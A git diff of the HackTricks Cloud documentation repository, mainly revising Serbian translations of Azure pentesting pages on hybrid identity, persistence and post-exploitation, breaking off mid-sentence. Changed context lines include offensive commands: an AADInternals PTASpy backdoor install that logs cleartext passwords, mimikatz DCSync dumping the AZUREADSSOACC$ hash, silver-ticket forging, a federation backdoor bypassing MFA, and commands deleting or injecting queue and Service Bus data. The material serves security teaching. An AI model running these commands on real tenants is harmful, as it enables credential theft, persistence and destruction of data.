diff --git a/.github/pull_request_template.md b/.github/pull_request_template.md index d8f81ff79..0e0ac2989 100644 --- a/.github/pull_request_template.md +++ b/.github/pull_request_template.md @@ -1,11 +1,9 @@ -You can remove this content before sending the PR: - ## Attribution -Cenimo vaše znanje i podstičemo vas da delite sadržaj. Molimo vas da osigurate da uploadujete samo sadržaj koji posedujete ili za koji imate dozvolu da ga delite od originalnog autora (dodajući referencu na autora u dodatom tekstu ili na kraju stranice koju menjate ili oboje). Vaše poštovanje prava intelektualne svojine doprinosi pouzdanoj i legalnoj sredini za deljenje za sve. +Cenimo vaše znanje i podstičemo vas da delite sadržaj. Molimo vas da osigurate da uploadujete samo sadržaj koji posedujete ili za koji imate dozvolu da ga delite od originalnog autora (dodajući referencu na autora u dodatom tekstu ili na kraju stranice koju modifikujete ili oboje). Vaše poštovanje prava intelektualne svojine doprinosi pouzdanoj i legalnoj sredini za deljenje za sve. ## HackTricks Training -Ako dodajete kako biste mogli da prođete na [ARTE certification](https://training.hacktricks.xyz/courses/arte) ispitu sa 2 zastavice umesto 3, potrebno je da nazovete PR `arte-`. +Ako dodajete kako biste mogli da prođete ispit za [ARTE certification](https://training.hacktricks.xyz/courses/arte) sa 2 zastavice umesto 3, potrebno je da nazovete PR `arte-`. Takođe, zapamtite da ispravke gramatike/sintakse neće biti prihvaćene za smanjenje zastavica ispita. -U svakom slučaju, hvala što doprinosite HackTricks! +U svakom slučaju, hvala vam što doprinosite HackTricks! diff --git a/.gitignore b/.gitignore index 7fa947732..8d12fbb76 100644 --- a/.gitignore +++ b/.gitignore @@ -3,8 +3,6 @@ - - # General .DS_Store .AppleDouble diff --git a/book.toml b/book.toml index 4add3bde9..e3330d5e6 100644 --- a/book.toml +++ b/book.toml @@ -1,5 +1,5 @@ [book] -authors = ["Carlos Polop"] +authors = ["HackTricks Team"] language = "en" multilingual = false src = "src" diff --git a/hacktricks-preprocessor.py b/hacktricks-preprocessor.py index 56a0cf0dc..37f549101 100644 --- a/hacktricks-preprocessor.py +++ b/hacktricks-preprocessor.py @@ -43,14 +43,14 @@ def ref(matchobj): if href.endswith("/"): href = href+"README.md" # Fix if ref points to a folder chapter, _path = findtitle(href, book, "source_path") - logger.debug(f'Recursive title search result: {chapter['name']}') + logger.debug(f'Recursive title search result: {chapter["name"]}') title = chapter['name'] except Exception as e: try: dir = path.dirname(current_chapter['source_path']) logger.debug(f'Error getting chapter title: {href} trying with relative path {path.normpath(path.join(dir,href))}') chapter, _path = findtitle(path.normpath(path.join(dir,href)), book, "source_path") - logger.debug(f'Recursive title search result: {chapter['name']}') + logger.debug(f'Recursive title search result: {chapter["name"]}') title = chapter['name'] except Exception as e: logger.debug(f'Error getting chapter title: {path.normpath(path.join(dir,href))}') diff --git a/src/README.md b/src/README.md index bdcd806c2..45d52447c 100644 --- a/src/README.md +++ b/src/README.md @@ -27,10 +27,10 @@ _Hacktricks logotipi & animacije dizajnirao_ [_@ppiernacho_](https://www.instagr **Proverite ih u:** -[HackTricks Vrednosti & FAQ](https://app.gitbook.com/s/-L_2uGJGU7AVNRcqRvEi/welcome/hacktricks-values-and-faq) +[HackTricks Values & FAQ](https://app.gitbook.com/s/-L_2uGJGU7AVNRcqRvEi/welcome/hacktricks-values-and-faq) ### Github Statistika -![HackTricks Cloud Github Statistika](https://repobeats.axiom.co/api/embed/1dfdbb0435f74afa9803cd863f01daac17cda336.svg) +![HackTricks Cloud Github Stats](https://repobeats.axiom.co/api/embed/1dfdbb0435f74afa9803cd863f01daac17cda336.svg) {{#include ./banners/hacktricks-training.md}} diff --git a/src/SUMMARY.md b/src/SUMMARY.md index 1b1d60c58..feae5163c 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -505,5 +505,3 @@ - - diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md index 9d0042e13..93d917ecb 100644 --- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md @@ -15,35 +15,35 @@ pta-pass-through-authentication.md {{#endref}} - **Password Hash Sync (PHS)**: -- Potencijalno vađenje lozinki u čistom tekstu privilegovanih korisnika iz AD, uključujući kredencijale visoko privilegovanog, automatski generisanog AzureAD korisnika. +- Potencijalno vađenje lozinki u čistom tekstu privilegovanih korisnika iz AD, uključujući akreditive visoko privilegovanog, automatski generisanog AzureAD korisnika. {{#ref}} phs-password-hash-sync.md {{#endref}} - **Federation**: -- Krađa privatnog ključa koji se koristi za SAML potpisivanje, omogućavajući impersonaciju on-prem i cloud identiteta. +- Krađa privatnog ključa korišćenog za SAML potpisivanje, omogućavajući impersonaciju on-prem i cloud identiteta. {{#ref}} federation.md {{#endref}} - **Seamless SSO:** -- Krađa lozinke korisnika `AZUREADSSOACC`, koja se koristi za potpisivanje Kerberos silver karata, omogućavajući impersonaciju bilo kog cloud korisnika. +- Krađa lozinke korisnika `AZUREADSSOACC`, koja se koristi za potpisivanje Kerberos srebrnih karata, omogućavajući impersonaciju bilo kog cloud korisnika. {{#ref}} seamless-sso.md {{#endref}} - **Cloud Kerberos Trust**: -- Mogućnost eskalacije sa Global Admin na on-prem Domain Admin manipulacijom korisničkih imena i SIDs AzureAD korisnika i zahtevom za TGT-ovima iz AzureAD. +- Mogućnost eskalacije sa Global Admin na on-prem Domain Admin manipulacijom AzureAD korisničkih imena i SIDs i zahtevom za TGT-ima iz AzureAD. {{#ref}} az-cloud-kerberos-trust.md {{#endref}} - **Default Applications**: -- Kompromitovanje naloga Administratora aplikacije ili on-premise Sync naloga omogućava modifikaciju postavki direktorijuma, članstava u grupama, korisničkih naloga, SharePoint sajtova i OneDrive datoteka. +- Kompromitovanje naloga Administratora aplikacija ili on-premise Sync naloga omogućava modifikaciju postavki direktorijuma, članstava u grupama, korisničkih naloga, SharePoint sajtova i OneDrive datoteka. {{#ref}} az-default-applications.md diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.md index a9d385302..63312fc02 100644 --- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.md +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.md @@ -25,7 +25,7 @@ Autentifikacija se validira u lokalnom AD-u, a komunikacija sa oblakom se vrši ### On-Prem -> oblak -Ako imate **admin** pristup **Azure AD Connect serveru** sa **PTA** **agentom** koji radi, možete koristiti **AADInternals** modul da **ubacite backdoor** koji će **validirati SVE lozinke** unesene (tako da će sve lozinke biti validne za autentifikaciju): +Ako imate **admin** pristup **Azure AD Connect serveru** na kojem radi **PTA** **agent**, možete koristiti **AADInternals** modul da **ubacite backdoor** koji će **validirati SVE lozinke** koje su unete (tako da će sve lozinke biti validne za autentifikaciju): ```powershell Install-AADIntPTASpy ``` @@ -36,11 +36,11 @@ Takođe je moguće **videti lozinke u čistom tekstu koje se šalju PTA agentu** ```powershell Get-AADIntPTASpyLog -DecodePasswords ``` -This backdoor will: +Ova backdoor će: -- Create a hidden folder `C:\PTASpy` -- Copy a `PTASpy.dll` to `C:\PTASpy` -- Injects `PTASpy.dll` to `AzureADConnectAuthenticationAgentService` process +- Kreirati skriveni folder `C:\PTASpy` +- Kopirati `PTASpy.dll` u `C:\PTASpy` +- Injektovati `PTASpy.dll` u proces `AzureADConnectAuthenticationAgentService` > [!NOTE] > Kada se AzureADConnectAuthenticationAgent servis ponovo pokrene, PTASpy se “uklanja” i mora se ponovo instalirati. diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.md index b9a57d274..3444103e3 100644 --- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.md +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.md @@ -10,9 +10,9 @@ U suštini, Azure AD Seamless SSO **prijavljuje korisnike** kada su **na PC-u pridruženom lokalnoj domeni**. -Podržava ga i [**PHS (Sinhronizacija heša lozinke)**](phs-password-hash-sync.md) i [**PTA (Autentifikacija prolaza)**](pta-pass-through-authentication.md). +Podržava ga i [**PHS (Password Hash Sync)**](phs-password-hash-sync.md) i [**PTA (Pass-through Authentication)**](pta-pass-through-authentication.md). -Desktop SSO koristi **Kerberos** za autentifikaciju. Kada je konfigurisan, Azure AD Connect kreira **račun računara nazvan AZUREADSSOACC`$`** u lokalnom AD-u. Lozinka računa `AZUREADSSOACC$` je **poslata u čistom tekstu Azure AD-u** tokom konfiguracije. +Desktop SSO koristi **Kerberos** za autentifikaciju. Kada je konfigurisan, Azure AD Connect kreira **račun računara nazvan AZUREADSSOACC`$`** u lokalnom AD-u. Lozinka `AZUREADSSOACC$` računa se **šalje u čistom tekstu Azure AD** tokom konfiguracije. **Kerberos karte** su **enkriptovane** koristeći **NTHash (MD4)** lozinke, a Azure AD koristi poslatu lozinku za dekripciju karata. @@ -20,7 +20,7 @@ Desktop SSO koristi **Kerberos** za autentifikaciju. Kada je konfigurisan, Azure ### On-prem -> cloud -**Lozinka** korisnika **`AZUREADSSOACC$` nikada se ne menja**. Stoga, domen administrator može kompromitovati **heš ovog računa**, a zatim ga koristiti za **kreiranje srebrnih karata** za povezivanje na Azure sa **bilo kojim korisnikom na lokaciji koji je sinhronizovan**: +**Lozinka** korisnika **`AZUREADSSOACC$` nikada se ne menja**. Stoga, administrator domena može kompromitovati **hash ovog računa**, a zatim ga koristiti za **kreiranje srebrnih karata** za povezivanje na Azure sa **bilo kojim lokalnim korisnikom koji je sinhronizovan**: ```powershell # Dump hash using mimikatz Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\azureadssoacc$ /domain:domain.local /dc:dc.domain.local"' @@ -38,7 +38,7 @@ Import-Module DSInternals $key = Get-BootKey -SystemHivePath 'C:\temp\registry\SYSTEM' (Get-ADDBAccount -SamAccountName 'AZUREADSSOACC$' -DBPath 'C:\temp\Active Directory\ntds.dit' -BootKey $key).NTHash | Format-Hexos ``` -Sa hešom sada možete **generisati srebrne karte**: +Sa hash-om sada možete **generisati srebrne karte**: ```powershell # Get users and SIDs Get-AzureADUser | Select UserPrincipalName,OnPremisesSecurityIdentifier @@ -72,7 +72,7 @@ Da biste iskoristili srebrnu kartu, sledeći koraci treba da se izvrše: #### Opcija 2 bez dcsync - SeamlessPass -Takođe je moguće izvršiti ovaj napad **bez dcsync napada** da biste bili diskretniji, kao što je objašnjeno u ovom blog postu. Za to vam je potrebna samo jedna od sledećih stavki: +Takođe je moguće izvršiti ovaj napad **bez dcsync napada** da biste bili diskretniji, kao što je [objašnjeno u ovom blog postu](https://malcrove.com/seamlesspass-leveraging-kerberos-tickets-to-access-the-cloud/). Za to vam je potrebna samo jedna od sledećih stavki: - **TGT kompromitovanog korisnika:** Čak i ako nemate jedan, ali je korisnik kompromitovan, možete dobiti jedan koristeći trik lažne TGT delegacije implementiran u mnogim alatima kao što su [Kekeo](https://x.com/gentilkiwi/status/998219775485661184) i [Rubeus](https://posts.specterops.io/rubeus-now-with-more-kekeo-6f57d91079b9). - **Zlatna karta**: Ako imate KRBTGT ključ, možete kreirati TGT koji vam je potreban za napadnutog korisnika. @@ -85,12 +85,12 @@ seamlesspass -tenant corp.com -domain corp.local -dc dc.corp.local -tgt +#### ~~Kreiranje Kerberos karata za korisnike koji su samo u cloudu~~ -Ako administratori Active Directory imaju pristup Azure AD Connect, mogu **postaviti SID za bilo kog cloud-korisnika**. Na ovaj način Kerberos **karte** mogu biti **kreirane i za korisnike koji koriste samo cloud**. Jedini zahtev je da SID bude ispravan [SID](). +Ako administratori Active Directory imaju pristup Azure AD Connect, mogu **postaviti SID za bilo kog cloud-korisnika**. Na ovaj način Kerberos **karte** mogu biti **kreirane i za korisnike koji su samo u cloudu**. Jedini zahtev je da SID bude ispravan [SID](). > [!CAUTION] -> Promena SID-a korisnika koji koriste samo cloud je sada **blokirana od strane Microsoft-a**.\ +> Promena SID-a korisnika koji su samo u cloudu je sada **blokirana od strane Microsoft-a**.\ > Za informacije proverite [https://aadinternals.com/post/on-prem_admin/](https://aadinternals.com/post/on-prem_admin/) ### On-prem -> Cloud putem Ograničene Delegacije na Bazi Resursa diff --git a/src/pentesting-cloud/azure-security/az-persistence/README.md b/src/pentesting-cloud/azure-security/az-persistence/README.md index b1f164009..4c71e7c98 100644 --- a/src/pentesting-cloud/azure-security/az-persistence/README.md +++ b/src/pentesting-cloud/azure-security/az-persistence/README.md @@ -6,15 +6,15 @@ Podrazumevano, svaki korisnik može registrovati aplikaciju u Azure AD. Tako možete registrovati aplikaciju (samo za ciljni tenant) koja zahteva visoke dozvole sa admin pristankom (odobrite je ako ste admin) - kao što je slanje maila u ime korisnika, upravljanje rolama itd. Ovo će nam omogućiti da **izvršimo phishing napade** koji bi bili veoma **plodonosni** u slučaju uspeha. -Štaviše, mogli biste takođe prihvatiti tu aplikaciju sa svojim korisnikom kao način da zadržite pristup nad njom. +Pored toga, mogli biste takođe prihvatiti tu aplikaciju sa vašim korisnikom kao način da zadržite pristup nad njom. ### Applications and Service Principals -Sa privilegijama Administratora aplikacija, GA ili prilagođene uloge sa microsoft.directory/applications/credentials/update dozvolama, možemo dodati kredencijale (tajni ključ ili sertifikat) postojećoj aplikaciji. +Sa privilegijama Application Administrator, GA ili prilagođenom ulogom sa microsoft.directory/applications/credentials/update dozvolama, možemo dodati kredencijale (tajni ključ ili sertifikat) postojećoj aplikaciji. Moguće je **ciljati aplikaciju sa visokim dozvolama** ili **dodati novu aplikaciju** sa visokim dozvolama. -Zanimljiva uloga koju bi trebalo dodati aplikaciji bila bi **Uloga privilegovanog administratora za autentifikaciju** jer omogućava **resetovanje lozinke** Globalnim Administratorima. +Zanimljiva uloga koju bi trebalo dodati aplikaciji bila bi **Privileged authentication administrator role** jer omogućava **resetovanje lozinke** Globalnim Administratorima. Ova tehnika takođe omogućava **obići MFA**. ```powershell @@ -38,9 +38,9 @@ Zatim, ažurirajte informacije o sertifikatu sa Azure AD: ```powershell Update-AADIntADFSFederationSettings -Domain cyberranges.io ``` -### Federation - Trusted Domain +### Federacija - Pouzdana Domen -Sa GA privilegijama na tenant-u, moguće je **dodati novu domenu** (mora biti verifikovana), konfigurisati njen tip autentifikacije na Federated i konfigurisati domenu da **veruje određenom sertifikatu** (any.sts u sledećoj komandi) i izdavaču: +Sa GA privilegijama na tenant-u, moguće je **dodati novi domen** (mora biti verifikovan), konfigurisati njegov tip autentifikacije na Federated i konfigurisati domen da **veruje određenom sertifikatu** (any.sts u sledećoj komandi) i izdavaču: ```powershell # Using AADInternals ConvertTo-AADIntBackdoor -DomainName cyberranges.io @@ -51,7 +51,7 @@ Get-MsolUser | select userPrincipalName,ImmutableID # Access any cloud app as the user Open-AADIntOffice365Portal -ImmutableID qIMPTm2Q3kimHgg4KQyveA== -Issuer "http://any.sts/B231A11F" -UseBuiltInCertificate -ByPassMFA$true ``` -## Референце +## Reference - [https://aadinternalsbackdoor.azurewebsites.net/](https://aadinternalsbackdoor.azurewebsites.net/) diff --git a/src/pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md b/src/pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md index baf547456..01e3e2978 100644 --- a/src/pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md +++ b/src/pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md @@ -20,7 +20,7 @@ az storage queue metadata update --name --metadata key1=value1 key2 az storage queue policy set --name --permissions rwd --expiry 2024-12-31T23:59:59Z --account-name ``` -## References +## Reference - https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues - https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api diff --git a/src/pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md b/src/pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md index 02ec1b332..80d36de01 100644 --- a/src/pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md +++ b/src/pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md @@ -27,7 +27,7 @@ az storage account blob-service-properties update \ ``` ### Microsoft.Storage/storageAccounts/read && Microsoft.Storage/storageAccounts/listKeys/action -Ove dozvole mogu omogućiti napadaču da izmeni politike zadržavanja, vrati obrisane podatke i pristupi osetljivim informacijama. +Ove dozvole mogu omogućiti napadaču da izmeni politike čuvanja, vrati obrisane podatke i pristupi osetljivim informacijama. ```bash az storage blob service-properties delete-policy update \ --account-name \ diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md index ceca46a34..16a9f50c1 100644 --- a/src/pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md @@ -4,7 +4,7 @@ ## Storage Privesc -Za više informacija o skladištu pogledajte: +Za više informacija o skladištu, proverite: {{#ref}} ../az-services/az-storage.md @@ -26,7 +26,7 @@ az storage blob download \ ``` ### Microsoft.Storage/storageAccounts/blobServices/containers/blobs/write -Princip sa ovom dozvolom će moći da **piše i prepisuje datoteke u kontejnerima** što bi moglo da mu omogući da izazove neku štetu ili čak da eskalira privilegije (npr. prepisivanje nekog koda koji je smešten u blob-u): +Princip sa ovom dozvolom će moći da **piše i prepisuje datoteke u kontejnerima** što bi moglo da mu omogući da izazove neku štetu ili čak da eskalira privilegije (npr. prepisivanje nekog koda koji je sačuvan u blob-u): ```bash # e.g. Microsoft.Storage/storageAccounts/blobServices/containers/blobs/write az storage blob upload \ diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md index 568b1e7ef..a7b05934a 100644 --- a/src/pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md @@ -2,7 +2,7 @@ {{#include ../../../banners/hacktricks-training.md}} -Post eksploatacija deljenja fajlova +File Share Post Exploitation Za više informacija o deljenju fajlova pogledajte: @@ -30,7 +30,7 @@ az storage file download \ ``` ### Microsoft.Storage/storageAccounts/fileServices/fileshares/files/write, Microsoft.Storage/storageAccounts/fileServices/writeFileBackupSemantics/action -Principal sa ovom dozvolom će moći da **piše i prepisuje datoteke u deljenim datotekama** što bi moglo da mu omogući da izazove neku štetu ili čak da eskalira privilegije (npr. prepisivanje nekog koda koji je smešten u deljenoj datoteci): +Principal sa ovom dozvolom će moći da **piše i prepisuje datoteke u deljenim datotekama** što bi moglo da mu omogući da izazove neku štetu ili čak da eskalira privilegije (npr. prepisivanje nekog koda smeštenog u deljenoj datoteci): ```bash az storage blob upload \ --account-name \ @@ -39,6 +39,6 @@ az storage blob upload \ ``` ### \*/delete -Ovo bi omogućilo brisanje datoteka unutar deljenog datotečnog sistema što bi moglo **prekinuti neke usluge** ili učiniti da klijent **izgubi dragocene informacije**. +Ovo bi omogućilo brisanje datoteka unutar deljenog fajl sistema što bi moglo **prekinuti neke usluge** ili učiniti da klijent **izgubi dragocene informacije**. {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md index 85d757a20..f288a2f98 100644 --- a/src/pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md @@ -1,16 +1,16 @@ -# Az - Function Apps Post Exploitation +# Az - Post Eksploatacija Funkcionih Aplikacija {{#include ../../../banners/hacktricks-training.md}} -## Funciton Apps Post Exploitaiton +## Post Eksploatacija Funkcionih Aplikacija -Za više informacija o funkcionalnim aplikacijama, proverite: +Za više informacija o funkcionalnim aplikacijama pogledajte: {{#ref}} ../az-services/az-function-apps.md {{#endref}} -> [!CAUTION] > **Trikovi post eksploatacije funkcionalnih aplikacija su veoma povezani sa trikovima eskalacije privilegija** tako da ih možete pronaći tamo: +> [!CAUTION] > **Trikovi za post eksploataciju funkcionalnih aplikacija su veoma povezani sa trikovima za eskalaciju privilegija** tako da ih možete pronaći sve tamo: {{#ref}} ../az-privilege-escalation/az-functions-app-privesc.md diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md index 05c0b5c5c..7752c56ed 100644 --- a/src/pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md @@ -27,7 +27,7 @@ az keyvault certificate purge --vault-name --name --name --algorithm --value @@ -64,7 +64,7 @@ az keyvault secret set --vault-name --name --value --name ``` @@ -76,7 +76,7 @@ az keyvault key delete --vault-name --name ``` ### **Microsoft.KeyVault/vaults/secrets/delete** -Ova dozvola omogućava principalu da obriše tajnu iz trezora. Tajna se premesta u stanje "soft-delete", gde može biti vraćena osim ako nije uklonjena. +Ova dozvola omogućava principalu da obriše tajnu iz trezora. Tajna se premesta u stanje "soft-delete", gde može biti obnovljena osim ako nije uklonjena. ```bash az keyvault secret delete --vault-name --name ``` diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.md index 38b38f5f3..f3fd2e4b1 100644 --- a/src/pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.md +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.md @@ -12,7 +12,7 @@ Za više informacija pogledajte: ### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/read` -Napadač sa ovom dozvolom može da pogleda poruke iz Azure Storage Queue. Ovo omogućava napadaču da vidi sadržaj poruka bez označavanja kao obrađenih ili menjanja njihovog stanja. To može dovesti do neovlašćenog pristupa osetljivim informacijama, omogućavajući eksfiltraciju podataka ili prikupljanje obaveštajnih podataka za dalja napada. +Napadač sa ovom dozvolom može da pregleda poruke iz Azure Storage Queue. Ovo omogućava napadaču da vidi sadržaj poruka bez označavanja kao obrađenih ili menjanja njihovog stanja. To može dovesti do neovlašćenog pristupa osetljivim informacijama, omogućavajući eksfiltraciju podataka ili prikupljanje obaveštajnih podataka za dalja napada. ```bash az storage message peek --queue-name --account-name ``` @@ -26,13 +26,13 @@ az storage message get --queue-name --account-name --content "Injected malicious message" --account-name ``` ### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/write` -Ova dozvola omogućava napadaču da doda nove poruke ili ažurira postojeće u Azure Storage Queue. Korišćenjem ove dozvole, mogli bi umetnuti štetan sadržaj ili izmeniti postojeće poruke, potencijalno obmanjujući aplikacije ili uzrokujući neželjeno ponašanje u sistemima koji se oslanjaju na red. +Ova dozvola omogućava napadaču da doda nove poruke ili ažurira postojeće u Azure Storage Queue. Korišćenjem ovoga, mogli bi umetnuti štetan sadržaj ili izmeniti postojeće poruke, potencijalno obmanjujući aplikacije ili uzrokujući neželjeno ponašanje u sistemima koji se oslanjaju na red. ```bash az storage message put --queue-name --content "Injected malicious message" --account-name @@ -46,7 +46,7 @@ az storage message update --queue-name \ ``` ### Actions: `Microsoft.Storage/storageAccounts/queueServices/queues/delete` -Ova dozvola omogućava napadaču da obriše redove unutar naloga za skladištenje. Korišćenjem ove sposobnosti, napadač može trajno ukloniti redove i sve njihove povezane poruke, uzrokujući značajne prekide u radnim tokovima i dovodeći do kritičnog gubitka podataka za aplikacije koje se oslanjaju na pogođene redove. Ova akcija se takođe može koristiti za sabotiranje usluga uklanjanjem bitnih komponenti sistema. +Ova dozvola omogućava napadaču da obriše redove unutar naloga za skladištenje. Korišćenjem ove sposobnosti, napadač može trajno ukloniti redove i sve njihove povezane poruke, uzrokujući značajne prekide u radnim tokovima i dovodeći do kritičnog gubitka podataka za aplikacije koje se oslanjaju na pogođene redove. Ova akcija se takođe može koristiti za sabotiranje usluga uklanjanjem suštinskih komponenti sistema. ```bash az storage queue delete --name --account-name ``` @@ -58,7 +58,7 @@ az storage message clear --queue-name --account-name --account-name @@ -66,7 +66,7 @@ az storage queue metadata update --name --metadata key1=value1 key2 az storage queue policy set --name --permissions rwd --expiry 2024-12-31T23:59:59Z --account-name ``` -## References +## Референце - https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues - https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.md index b226922f3..4a3d11948 100644 --- a/src/pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.md +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.md @@ -10,13 +10,13 @@ Za više informacija pogledajte: ../az-services/az-servicebus-enum.md {{#endref}} -### Actions: `Microsoft.ServiceBus/namespaces/Delete` +### Akcije: `Microsoft.ServiceBus/namespaces/Delete` -Napadač sa ovom dozvolom može obrisati čitav Azure Service Bus namespace. Ova akcija uklanja namespace i sve povezane resurse, uključujući redove, teme, pretplate i njihove poruke, uzrokujući široku disruptivnost i trajni gubitak podataka u svim zavisnim sistemima i radnim tokovima. +Napadač sa ovom dozvolom može obrisati čitav Azure Service Bus namespace. Ova akcija uklanja namespace i sve povezane resurse, uključujući redove, teme, pretplate i njihove poruke, uzrokujući široku prekid i trajni gubitak podataka u svim zavisnim sistemima i radnim tokovima. ```bash az servicebus namespace delete --resource-group --name ``` -### Actions: `Microsoft.ServiceBus/namespaces/topics/Delete` +### Akcije: `Microsoft.ServiceBus/namespaces/topics/Delete` Napadač sa ovom dozvolom može da obriše Azure Service Bus temu. Ova akcija uklanja temu i sve njene povezane pretplate i poruke, što može dovesti do gubitka kritičnih podataka i ometanja sistema i radnih tokova koji se oslanjaju na temu. ```bash @@ -28,41 +28,41 @@ Napadač sa ovom dozvolom može da obriše Azure Service Bus red. Ova akcija ukl ```bash az servicebus queue delete --resource-group --namespace-name --name ``` -### Actions: `Microsoft.ServiceBus/namespaces/topics/subscriptions/Delete` +### Akcije: `Microsoft.ServiceBus/namespaces/topics/subscriptions/Delete` -Napadač sa ovom dozvolom može da obriše Azure Service Bus pretplatu. Ova akcija uklanja pretplatu i sve njene povezane poruke, potencijalno ometajući radne tokove, obradu podataka i operacije sistema koje se oslanjaju na pretplatu. +Napadač sa ovom dozvolom može da obriše Azure Service Bus pretplatu. Ova akcija uklanja pretplatu i sve njene povezane poruke, potencijalno ometajući radne tokove, obradu podataka i sistemske operacije koje se oslanjaju na pretplatu. ```bash az servicebus topic subscription delete --resource-group --namespace-name --topic-name --name ``` -### Actions: `Microsoft.ServiceBus/namespaces/write` & `Microsoft.ServiceBus/namespaces/read` +### Akcije: `Microsoft.ServiceBus/namespaces/write` & `Microsoft.ServiceBus/namespaces/read` -Napadač sa dozvolama za kreiranje ili modifikovanje Azure Service Bus imenskih prostora može to iskoristiti da ometa operacije, implementira neovlašćene resurse ili izloži osetljive podatke. Mogu promeniti kritične konfiguracije kao što su omogućavanje pristupa javnoj mreži, smanjenje podešavanja enkripcije ili promenu SKU-ova kako bi pogoršali performanse ili povećali troškove. Pored toga, mogli bi onemogućiti lokalnu autentifikaciju, manipulisati lokacijama replika ili prilagoditi TLS verzije kako bi oslabili bezbednosne kontrole, čineći pogrešnu konfiguraciju imenskog prostora značajnim rizikom nakon eksploatacije. +Napadač sa dozvolama za kreiranje ili modifikovanje Azure Service Bus imenskih prostora može iskoristiti ovo da ometa operacije, implementira neovlašćene resurse ili izloži osetljive podatke. Mogu promeniti kritične konfiguracije kao što su omogućavanje pristupa javnoj mreži, smanjenje podešavanja enkripcije ili promenu SKU-ova kako bi pogoršali performanse ili povećali troškove. Pored toga, mogli bi onemogućiti lokalnu autentifikaciju, manipulisati lokacijama replika ili prilagoditi TLS verzije kako bi oslabili bezbednosne kontrole, čineći pogrešnu konfiguraciju imenskog prostora značajnim rizikom nakon eksploatacije. ```bash az servicebus namespace create --resource-group --name --location az servicebus namespace update --resource-group --name --tags ``` ### Actions: `Microsoft.ServiceBus/namespaces/queues/write` (`Microsoft.ServiceBus/namespaces/queues/read`) -Napadač sa dozvolama za kreiranje ili modifikovanje Azure Service Bus redova (da bi modifikovao red, takođe će mu biti potrebna akcija: `Microsoft.ServiceBus/namespaces/queues/read`) može iskoristiti ovo da presretne podatke, ometa radne tokove ili omogući neovlašćen pristup. Mogu promeniti kritične konfiguracije kao što su prosleđivanje poruka na zlonamerne krajnje tačke, podešavanje TTL poruka za nepropisno zadržavanje ili brisanje podataka, ili omogućavanje dead-lettering-a kako bi ometali obradu grešaka. Pored toga, mogli bi manipulisati veličinama redova, trajanjem zaključavanja ili 